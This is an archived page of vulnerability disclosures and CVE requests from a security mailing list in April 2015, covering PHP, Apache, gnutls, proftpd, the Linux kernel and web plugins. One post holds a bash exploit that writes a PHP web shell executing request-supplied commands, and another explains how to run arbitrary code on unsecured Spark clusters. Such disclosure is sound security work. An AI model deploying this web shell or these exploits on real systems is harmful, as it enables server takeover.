Henri Salo | 19 Apr 08:45 2015
Picon

Wolf CMS 0.8.2 Arbitrary File Upload Vulnerability

http://seclists.org/bugtraq/2015/Apr/112

Vendor response:

"""
This is I believe works as designed. There is currently no limit on what a
user can upload.

As this is only possible for authenticated users, we are currently not
considering this a security issue.

If you feel differently, please elaborate why you consider this a security
issue. I guess we could add a strict upload mode.

Cheers, Martijn
"""

Prathan Phongthiproek has requested CVE identifier for this issue.

Comments? Opinions?

--

-- 
Henri Salo

Larry W. Cashdollar | 18 Apr 15:06 2015

Exploit for VideoWhisper WP plugins file upload incomplete fix.

#!/bin/bash
#A quick Exploit for the VideoWhisper file upload incomplete fix I posted a few weeks ago.
#Larry W. Cashdollar v1.0

cat > shell.pht << -EOF-
<?php
if(isset(\$_REQUEST[‘cmd’])){
        echo "<pre>";
        \$cmd = (\$_REQUEST[‘cmd’]);
        system(\$cmd);
        echo "</pre>";
} else { echo "Please supply a command cmd"; }
?>
-EOF-

red='\033[0;31m'
NC='\033[0m' # No Color

while [ true ]; do 
echo -e ${red};
echo -e "				VideoWhisper Remote File Upload PoC Redux $NC";
echo "						4/14/2015";
echo "					   Larry W. Cashdollar,  <at> _larry0";
echo
echo
echo "Linux OSs like Debian or Ubuntu have .phtml, .pht defined as";
echo "SetHandler application/x-httpd-php in php5.conf";
echo "So WP instances hosted on thos OSs are still vulnerable to CVE-2014-1905";
echo "and bid 53851.";
echo "		     - Advisories -";
(Continue reading)

Eric Windisch | 17 Apr 17:44 2015
Picon

USERNS allows circumventing MNT_LOCKED

In October 2014, Andrey Vagin reported[1] to the Linux Containers list that
it would be possible to use user namespaces to circumvent MNT_LOCKED and
allow unprivileged users to access the directory structure underneath of
mounts. A PoC was also produced and is public.

Patches are now available and proposed to Linus[2].

This may not simply be information disclosure, but containerized
environments may through chroot and mount namespaces mask directory
structures as read-only or inaccessible via the use of bind-mounts. Such
read-only masking may be circumvented by this vulnerability on systems
where these directories are not otherwise protected by MAC (i.e. SELinux or
AppArmor).

Regards,
Eric Windisch

[1] https://groups.google.com/forum/#!topic/linux.kernel/HnegnbXk0Vs
[2] http://www.spinics.net/lists/linux-containers/msg30786.html
Marc Deslauriers | 17 Apr 11:06 2015

CVE Request: PHP potential remote code execution with apache 2.4 apache2handler

Hello,

PHP 5.4.40, 5.5.24 and 5.6.8 fixed a potential remote code execution
vulnerability when used with the Apache 2.4 apache2handler.

https://bugs.php.net/bug.php?id=69218
https://bugs.php.net/bug.php?id=68486 (still private)

Fixed by:

http://git.php.net/?p=php-src.git;a=commit;h=809610f5ea38a83b284e1125d1fff129bdd615e7

Could a CVE please be assigned to this issue?

Thanks,

Marc.

Emmanuel Law | 16 Apr 21:11 2015
Picon

[CVE Request] Multiple vulnerabilities in PHP's Phar handling

This serves as a cve request + advisory.

--------Background---------
PHP has the built-in Phar & PharData functionality since 5.3.0. It allows
developers to use them to manipulate the following archive types: tar, zip,
phar. Serveral vulnerabilities were found in the Phar extenion.

[1: CVE Request]
There is a stack based buffer overflow when opening tar, zip or phar
archives through the Phar extension. An attacker and exploit this to run
arbitrary code.
Affected versions: PHP < 5.6.8RC1
Bug Report: https://bugs.php.net/bug.php?id=69441
Patch:
http://git.php.net/?p=php-src.git;a=commit;h=f59b67ae50064560d7bfcdb0d6a8ab284179053c

Please assign a CVE for this.

[2: Advisory for CVE-2015-2783]
When processing a specially crafted phar file, it is possible to trigger a
buffer over-read in PHP's unserialize function. An attacker can exploit
this to dump memory info leak on the system.
Affected versions: PHP < 5.6.8RC1
Bug Report: https://bugs.php.net/bug.php?id=69324
Patch:
http://git.php.net/?p=php-src.git;a=commit;h=17cbd0b5b78a7500f185b3781a2149881bfff8ae

rgds,
Emmanuel
(Continue reading)

Akhil Das | 16 Apr 20:19 2015

CVE Request: Arbitary Code Execution in Apache Spark Cluster

# *Vendor Homepage*: https://spark.apache.org/
# *Software Link*: https://spark.apache.org/downloads.html
# *Version*: All (0.0.x, 1.1.x, 1.2.x, 1.3.x)
# *Tested on*: 1.2.1

# Reference(s) :
http://codebreach.in/blog/2015/03/arbitary-code-execution-in-unsecured-apache-spark-cluster/
# Exploit URL  : https://github.com/akhld/spark-exploit/

# Spark clusters which are not secured with proper firewall can be taken
over easily (Since it does not have
# any authentication mechanism), this exploit simply runs arbitarty codes
over the cluster.
# All you have to do is, find a vulnerable Spark cluster (usually runs on
port 7077) add that host to your
# hosts list so that your system will recognize it (here its
spark-b-akhil-master pointing
# to 54.155.61.87 in my /etc/hosts) and submit your Spark Job with arbitary
codes that you want to execute.

# Language: Scala

import org.apache.spark.{SparkContext, SparkConf}

/**
 * Created by akhld on 23/3/15.
 */

object Exploit {
  def main(arg: Array[String]) {
(Continue reading)

Florian Weimer | 16 Apr 14:42 2015
Picon

kernel: fs.suid_dumpable=2 privilege escalation

Should this be treated as a security vulnerability?

“fs: make dumpable=2 require fully qualified path”
<http://lwn.net/Articles/503682/>

Some widely-used cronie versions still do not have hardening and parse
commands in core dumps.

--

-- 
Florian Weimer / Red Hat Product Security

Martin Prpic | 16 Apr 10:08 2015
Picon

Potential CVE request: flaw in comment handling

Hi, we were notified of a flaw in the way Apache's mod_access_compat and
mod_authz_host handled comments in configuration files. When a comment
was defined on the same line that contained an "Allow" directive,
any potential IP ranges in that comment were also allowed to access
a resource.

This flaw was fixed in:

https://github.com/apache/httpd/commit/5e1affc271a429f267198eee61fce2b209a83c66

The docs do specify that comments are not allowed on the same line:

"There must be no other characters or white space between the backslash and the end of the line."
[https://httpd.apache.org/docs/2.2/configuring.html#syntax]

MITRE, does this qualify for a CVE?

Reproducer:

$ sudo yum -y install httpd

$ echo hest123 | sudo tee /var/www/html/secret.txt

$ echo '<Location "/secret.txt">
> Order allow,deny
> Allow from 127.0.0.1 # not 10
> </Location>' | sudo tee -a /etc/httpd/conf/httpd.conf
sudo service httpd restart

client on 10.x.x.x:
(Continue reading)

Jakub Filak | 15 Apr 11:45 2015
Picon

Re: Problems in automatic crash analysis frameworks

Hello,

I have a question regarding the ABRT vulnerabilities. I don't particularly understand how an attacker can
use /proc/pid/exe symlink to force ABRT to read an arbitrary file if the symlink cannot be changed and
kernel refuses to create the process if the symlink's target is not executable.

> This code trusts the /proc/pid/exe symlink, even though it is possible
> to link it anywhere you want.
>
> https://github.com/abrt/abrt/blob/master/src/hooks/abrt-hook-ccpp.c#L368
>
>        sprintf(buf, "/proc/%lu/exe", (long)pid);
>        int src_fd_binary = open(buf, O_RDONLY); /* might fail and
>                                                    return -1, it's ok */

Thank you for clarifying this for me.

Kind regards,
Jakub

Robert Święcki | 15 Apr 15:47 2015
Picon

double-free in gnutls (CRL distribution points parsing)

gnutls 3.3.14 fixes a double-free in parsing CRL distribution points.

It will affect applications which parse CRL distribution points or
print contents of certificates with gnutls-provided functions (e.g.
gnutls_x509_crt_print())

Usually a DoS under modern mem allocators, but creating something more
interesting using double-free exploitation techniques is not out of
the question

changelists:
https://gitlab.com/gnutls/gnutls/commit/d6972be33264ecc49a86cd0958209cd7363af1e9
https://gitlab.com/gnutls/gnutls/commit/053ae65403216acdb0a4e78b25ad66ee9f444f02

--

-- 
Robert Święcki

Hanno Böck | 15 Apr 02:39 2015
Picon

proftpd: Unauthenticated copying of files via SITE CPFR/CPTO allowed by mod_copy

This sounds serious:
https://github.com/proftpd/proftpd/pull/109
http://bugs.proftpd.org/show_bug.cgi?id=4169
https://cxsecurity.com/issue/WLB-2015040075

When the module mod_copy is enabled one can copy around files on the
server without any authentication.

(Not sure how widespread the use of this module is.)

There is no upstream release with a fix yet.

cu,
--

-- 
Hanno Böck
http://hboeck.de/

mail/jabber: hanno@...
GPG: BBB51E42

Gmane